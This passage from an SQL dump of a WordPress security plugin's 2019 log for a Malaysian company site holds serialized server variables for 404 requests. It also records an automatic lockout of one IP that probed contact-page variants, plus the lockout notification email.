QQBrowser/9.5.11096.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"107.152.247.57\";s:11:\"REMOTE_PORT\";s:5:\"32037\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaQJvWQflmQKZNUpCuepAAAAAMw\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571031485.8218\";s:12:\"REQUEST_TIME\";s:10:\"1571031485\";}}','notice','2019-10-14 05:38:07','2019-10-14 05:38:06',35030432,36834232,'https://bintara.com.my/?page_id=18',1,0,'107.152.247.57'),(28015,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:35:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:74:\"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:34:\"https://bintara.com.my/?page_id=11\";s:15:\"HTTP_USER_AGENT\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.75 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"91.236.74.21\";s:11:\"REMOTE_PORT\";s:5:\"64239\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaP7s70j4KqzOPWDFBPacgAAAgI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571027891.366\";s:12:\"REQUEST_TIME\";s:10:\"1571027891\";}}','notice','2019-10-14 04:38:15','2019-10-14 04:38:11',35429856,37238888,'https://bintara.com.my/?page_id=11',1,0,'91.236.74.21'),(28014,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/18-2__trashed/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/18-2__trashed/\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/18-2__trashed/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaP402QflmQKZNUpCuejwQAAAM0\";s:12:\"REDIRECT_URL\";s:15:\"/18-2__trashed/\";s:11:\"REMOTE_ADDR\";s:12:\"40.77.167.18\";s:11:\"REMOTE_PORT\";s:4:\"9222\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/18-2__trashed/\";s:10:\"SCRIPT_URL\";s:15:\"/18-2__trashed/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaP402QflmQKZNUpCuejwQAAAM0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571027155.8591\";s:12:\"REQUEST_TIME\";s:10:\"1571027155\";}}','notice','2019-10-14 04:25:58','2019-10-14 04:25:56',33931952,35738576,'https://bintara.com.my/18-2__trashed/',1,0,'40.77.167.18'),(28012,0,'lockout','host-lockout::183.197.116.193','a:13:{s:6:\"module\";s:12:\"four_oh_four\";s:4:\"host\";s:15:\"183.197.116.193\";s:7:\"user_id\";b:0;s:8:\"username\";b:0;s:14:\"module_details\";a:4:{s:4:\"type\";s:12:\"four_oh_four\";s:6:\"reason\";s:54:\"too many attempts to access a file that does not exist\";s:4:\"host\";i:20;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:12:\"four_oh_four\";s:13:\"lockout_start\";s:19:\"2019-10-14 12:04:48\";s:17:\"lockout_start_gmt\";s:19:\"2019-10-14 04:04:48\";s:14:\"lockout_expire\";s:19:\"2019-10-18 16:04:48\";s:18:\"lockout_expire_gmt\";s:19:\"2019-10-18 08:04:48\";s:12:\"lockout_host\";s:15:\"183.197.116.193\";}','action','2019-10-14 04:04:51','2019-10-14 04:04:48',35107616,36833440,'https://bintara.com.my/contact_us',1,0,'183.197.116.193'),(28013,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-10-14 04:04:53','2019-10-14 04:04:48',35470008,36833440,'https://bintara.com.my/contact_us',1,0,'183.197.116.193'),(28011,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/contact_us\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/contact_us\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/contact_us\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPz370j4KqzOPWDFBPVewAAAhY\";s:12:\"REDIRECT_URL\";s:11:\"/contact_us\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"24340\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/contact_us\";s:10:\"SCRIPT_URL\";s:11:\"/contact_us\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPz370j4KqzOPWDFBPVewAAAhY\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025887.9081\";s:12:\"REQUEST_TIME\";s:10:\"1571025887\";}}','notice','2019-10-14 04:04:51','2019-10-14 04:04:48',35026192,36833440,'https://bintara.com.my/contact_us',1,0,'183.197.116.193'),(28010,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/contact_us.asp\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/contact_us.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/contact_us.asp\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPz270j4KqzOPWDFBPVeQAAAgs\";s:12:\"REDIRECT_URL\";s:15:\"/contact_us.asp\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"24321\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/contact_us.asp\";s:10:\"SCRIPT_URL\";s:15:\"/contact_us.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPz270j4KqzOPWDFBPVeQAAAgs\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025884.0052\";s:12:\"REQUEST_TIME\";s:10:\"1571025884\";}}','notice','2019-10-14 04:04:46','2019-10-14 04:04:44',35021776,36827048,'https://bintara.com.my/contact_us.asp',1,0,'183.197.116.193'),(28009,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/contact_us.aspx\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/contact_us.aspx\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/contact_us.aspx\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPz170j4KqzOPWDFBPVdwAAAhg\";s:12:\"REDIRECT_URL\";s:16:\"/contact_us.aspx\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"24301\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/contact_us.aspx\";s:10:\"SCRIPT_URL\";s:16:\"/contact_us.aspx\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPz170j4KqzOPWDFBPVdwAAAhg\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025879.6214\";s:12:\"REQUEST_TIME\";s:10:\"1571025879\";}}','notice','2019-10-14 04:04:43','2019-10-14 04:04:40',35022864,36820992,'https://bintara.com.my/contact_us.aspx',1,0,'183.197.116.193'),(28008,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/contact_us.jsp\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/contact_us.jsp\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/contact_us.jsp\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPz0@64dmMiXPBY9-n5MwAAAJc\";s:12:\"REDIRECT_URL\";s:15:\"/contact_us.jsp\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"24271\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/contact_us.jsp\";s:10:\"SCRIPT_URL\";s:15:\"/contact_us.jsp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPz0@64dmMiXPBY9-n5MwAAAJc\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025875.7886\";s:12:\"REQUEST_TIME\";s:10:\"1571025875\";}}','notice','2019-10-14 04:04:38','2019-10-14 04:04:36',35021776,36827048,'https://bintara.com.my/contact_us.jsp',1,0,'183.197.116.193'),(28007,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/contact_us.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/contact_us.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:15:\"/contact_us.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XaPz0L0j4KqzOPWDFBPVcgAAAgU\";s:29:\"REDIRECT_REDIRECT_nokeepalive\";s:1:\"1\";s:38:\"REDIRECT_REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/contact_us.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/contact_us.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPz0L0j4KqzOPWDFBPVcgAAAgU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"24248\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/contact_us.php\";s:10:\"SCRIPT_URL\";s:15:\"/contact_us.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPz0L0j4KqzOPWDFBPVcgAAAgU\";s:11:\"nokeepalive\";s:1:\"1\";s:20:\"ssl_unclean_shutdown\";s:1:\"1\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571025872.3471\";s:12:\"REQUEST_TIME\";s:10:\"1571025872\";}}','notice','2019-10-14 04:04:34','2019-10-14 04:04:32',35029952,36833800,'https://bintara.com.my/contact_us.php',1,0,'183.197.116.193'),(28006,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:15:\"/contact_us.htm\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:190:\"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"https://bintara.com.my/contact_us.htm\";s:19:\"REDIRECT_SCRIPT_URL\";s:15:\"/contact_us.htm\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XaPzzGQflmQKZNUpCueiVAAAAMc\";s:12:\"REDIRECT_URL\";s:15:\"/contact_us.htm\";s:20:\"REDIRECT_nokeepalive\";s:1:\"1\";s:29:\"REDIRECT_ssl_unclean_shutdown\";s:1:\"1\";s:11:\"REMOTE_ADDR\";s:15:\"183.197.116.193\";s:11:\"REMOTE_PORT\";s:5:\"24216\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"https://bintara.com.my/contact_us.htm\";s:10:\"SCRIPT_URL\";s:15:\"/contact_us.htm\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaPzzGQflmQKZNUpCueiVAAAAMc\";s:11:\"n